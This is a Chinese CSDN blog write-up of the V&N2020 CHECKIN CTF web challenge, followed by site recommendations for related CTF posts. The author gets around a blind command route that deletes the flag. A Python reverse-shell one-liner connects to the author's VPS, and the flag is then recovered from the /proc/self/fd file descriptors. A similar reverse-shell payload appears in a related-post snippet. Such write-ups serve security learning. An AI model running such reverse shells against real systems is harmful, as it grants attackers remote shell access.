V&N2020 公开赛 CHECKIN

于 2021-11-05 12:49:05 发布
阅读量1.3k 收藏
点赞数
分类专栏: web学习 flask 文章标签: python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cjdgg/article/details/121160502
版权
博客讲述了在Python环境中利用反弹Shell技术获取服务器权限,并在程序删除flag文件但仍在运行的情况下,通过Linux的/proc/self/找到Flag的过程。重点涉及Python反弹Shell的命令构造和Linux文件描述符的知识。
摘要由CSDN通过智能技术生成

V&N2020 公开赛 CHECKIN

这题直接给出了源代码,不是很多,也很简单
在这里插入图片描述
直接访问/flag是拿不到flag的

而访问/shell虽然可以执行一条传入的命令,但是它会把存放flag的txt文件给删掉

在这里插入图片描述
而且由于/shell路由返回的是1,所以我们是看不到命令执行后的回显的,那就只能弹shell了

因为这里是python环境下,所以去找了python环境下反弹shell相关文章
在这里插入图片描述
emem我就拿了这个改成了自己的vps地址,这里得注意一点,估计是靶机环境的缘故,得是python3才能执行

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("42.193.22.50",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

这道题因为程序把flag文件给删掉了,但是程序还在运行着,所以flag其实已经被加载到了程序的fd文件夹里,我们去里面找就行,具体原理之前写过一篇Linux的/proc/self/学习里面有讲

在这里插入图片描述

lmonstergg
关注
专栏目录
BUUCTF-CRYPTO-[V&N2020 公开赛]Backtrace
zippo1234的博客
10-25 1217
BUUCTF-CRYPTO-[V&N2020 公开赛]Backtrace[V&N2020 公开赛]Backtrace题目分析开始1.题目2.分析(1)MT19937算法生产随机数的过程(2)逆向 extract_number(3)逆向twist3.解题思路4.脚本5.get flag结语 每天一题,只能多不能少 [V&N2020 公开赛]Backtrace 题目分析 1、MT19937随机数破解 2、随机数状态state逆向破解 开始 1.题目 题目很简单,给了生产脚本backtra
buu做题笔记——[BJDCTF2020]Mark loves cat&[MRCTF2020]Ez_bypass&[GKCTF2020]CheckIN
weixin_46330722的博客
11-05 616
BUU[BJDCTF2020]Mark loves cat[MRCTF2020]Ez_bypass [BJDCTF2020]Mark loves cat 进入题目是一个博客首页 点了半天没找到可以利用的点,用dirsearch扫一下 扫到.git目录,用Githack把源码down下来 看一下关键代码 //flag.php <?php $flag = file_get_contents('/flag'); //index.php <?php include 'flag.php';
几种反弹shell命令
qq_44657899的博客
07-19 707
https://www.cnblogs.com/20175211lyz/p/12397933.html
[V&N2020 公开赛]CHECKIN
Sk1y的博客
09-16 132
知识点:文件读取,反弹shell 解题过程 payload:(ip,port自行修改) shell?c=python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin
[V&N2020 公开赛]CHECKIN(文件被进程打开后被删除,内存中有文件内容)
qq_44657899的博客
09-11 706
这道题我在vps上实验了一下,对于linux的理解又加深了。 知识点:文件描述符, 在linux里,当一个进程打开某个文件直到关闭前,该进程会获得文件描述符,而文件描述符里有文件的内容,即便已经将文件删除,只是删除了其相应的目录索引节点,若进程依然存在没被关闭的话,就依然可以通过文件提供给它的文件描述符进行操作。/proc/[pid]/fd这个目录里包含了进程打开文件的情况,pid就是进程记录的打开文件的序号。 实验:读取内存中的flag内容 使用命令:lsof lsof命令可以查看进程打开那些文件
2020 年 V&N 内部考核赛 WriteUp
12-22
CheckIN 源码 from flask import Flask, request import os app = Flask(__name__) flag_file = open("flag.txt", "r") # flag = flag_file.read() # flag_file.close() # # @app.route('/flag') # def flag(): # ...
【pwn】WMCTF2020 cfgo-CheckIn
Nothing
08-03 2311
拿到二进制后先解UPX,解完后发现程序还是很复杂,发现是cgo,做题的时候不知道有没有这种的插件支持,问了下做逆向的队友,似乎插件版本没有更新到这个版本,静态分析没有进展,先看看远程服务是跑啥的。 一个迷宫,走到旗子的位置就行了,一共100关,一波深搜就行了,解决了100关后出现了。 在二进制中搜索字符串无果,就当blind pwn做了,输入name后程序就退出了,可能存在的漏洞格式化字符串以及溢出,尝试发现没有格式化字符串漏洞,然后尝试溢出。当输入了0x78个字符后发现出现了报错信息。这里报错信息还是
checkin
03-18
【标题】:“checkin”项目解析 【描述】:这个名为“checkin”的项目是一个针对“深层链接”教程而创建的“酒店基本入住”Web应用程序。它的主要目标是提供一个平台,用户可以在这个平台上模拟酒店的入住流程,...
GKCTF2020 - Web(CheckIN)
ximo的博客
03-16 292
CheckIN 题目,代码审计: <?php highlight_file(__FILE__); class ClassName { public $code = null; public $decode = null; function __construct() { $this->code = @$this->x()['Ginkgo']; $this-&gt
[V&N2020 公开赛]CHECKIN -wp
freerats的博客
08-05 265
from flask import Flask, request import os app = Flask(__name__) flag_file = open("flag.txt", "r") # flag = flag_file.read() # flag_file.close() # # @app.route('/flag') # def flag(): # return flag ## want flag? naive! # You will never find the thing
[V&N2020 公开赛]HappyCTFd
brainw的博客
05-22 414
[V&N2020 公开赛]HappyCTFd 一个平台 先注册 登录试下 没有题目 只有一个我注册的用户和admin 抓包登录 这个可能是 防止爆破的把? 没有头绪 忘记密码需要邮箱 看下write up 账户接管漏洞 https://www.colabug.com/2020/0204/6940556/amp/ 我们的攻击方式便很明显了: 利用添加空格绕过限制来注册一个与受害者用户名相同的账号 生成忘记密码链接发送到自己的邮箱 将自己的账号的用户名改成与被攻击者不相同的用户名 用邮箱中收到的链
[V&N2020 公开赛 web]
weixin_43610673的博客
04-05 1102
HappyCTFd CVE-2020-7245 https://nvd.nist.gov/vuln/detail/CVE-2020-7245 https://www.colabug.com/2020/0204/6940556/ 开始以为是注入,尝试了好一会无从下手,然后看wp知道是cve。。。https://www.zhaoj.in/read-6407.html 注册一个 admin用户...
【pwn】V&N2020 公开赛 simpleHeap
woodwhale的博客
08-27 3725
【pwn】V&N2020 公开赛 simpleHeap 1、静态分析 首先libc版本是ubuntu16的2.23版本,可以去buu的资源处下载 然后checksec一下,保护全开 拖入IDA中分析 去除了符号表,通过menu函数分析出有add、edit、show、delete 1.add() add函数分析一遍,发现没什么漏洞,就是普普通通的输入一个需要申请的size(空间大小),然后再向这个malloc的空间中输入content(内容),其中size不能大于111(0x6F)。 2.ed
[V&N2020 公开赛]内存取证
volcano的博客
04-08 4878
题目地址: https://buuoj.cn/challenges#[V&N2020 公开赛]内存取证 这题用到的内存取证分析工具是Volatility 关于这个工具的具体命令非常多,可以在官方页面仔细看看 解题 先下载上面的附件,这种raw文件是内存取证工具Dumpit提取内存生成的内存转储文件。 ...
re学习笔记(48)BUUCTF-re-[V&N2020 公开赛]CSRe
逆向随笔
03-01 1726
新手一枚,如有错误(不足)请指正,谢谢!! 个人博客:点击进入 C#程序,且用Eazfuscator.NET混淆了代码。 使用de4dot工具进行处理 之后使用dnSpy32位打开 找到main()函数 Class3.smethod_0查看发现是对字符串进行sha1加密。 加密后与字符串进行比对。 将加密后的在【cmd5】网站进行查询 得到flag为flag{1415turn} ...
BUUCTF:[V&N2020 公开赛]拉胯的三条命令
末初的CSDN博客
11-03 1074
题目地址:https://buuoj.cn/challenges#[V&N2020%20%E5%85%AC%E5%BC%80%E8%B5%9B]%E6%8B%89%E8%83%AF%E7%9A%84%E4%B8%89%E6%9D%A1%E5%91%BD%E4%BB%A4 题目文件zip zip文件,添加后缀zip 说明.txt 在参加网络安全大赛第二届世界巡回赛新加坡站一场与SP战队的比赛时,作为K&K战队主防手的你使用经典的“三条命令”检查端口封闭状况。可是这次比赛平台没有回显,.
re学习笔记(47)BUUCTF-re-[V&N2020 公开赛]strangeCpp
逆向随笔
03-01 1647
新手一枚,如有错误(不足)请指正,谢谢!! 个人博客:点击进入 main()函数没啥东西…… 找好久… putchar字节这里,中间夹杂着数据…… 然后交叉引用,来到这里 其中sub_140011384()函数,将dword_140021190操作得到result 然后result要等于607052314,dword_140021190要小于等于14549743 缩小爆破范围…… 写脚本 ...
2021gkctf checkin
最新发布
02-29
2021gkctf checkin 是一个CTF(Capture The Flag)比赛,是由GKSEC团队举办的。CTF比赛是一种网络安全竞赛,旨在测试参赛者在网络安全领域的技能和知识。 在2021gkctf checkin中,参赛者需要完成一系列的网络安全挑战,包括密码学、逆向工程、漏洞利用等等。参赛者需要通过解决这些挑战来获取旗帜(flag),并提交给比赛组织者。 比赛的checkin阶段通常是指参赛者进行报名和注册的过程。具体的checkin流程可能因比赛组织者而异,一般需要填写个人信息、同意比赛规则等等。 如果你想了解更多关于2021gkctf checkin的信息,建议你访问GKSEC团队的官方网站或者参考他们的相关公告和规则。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值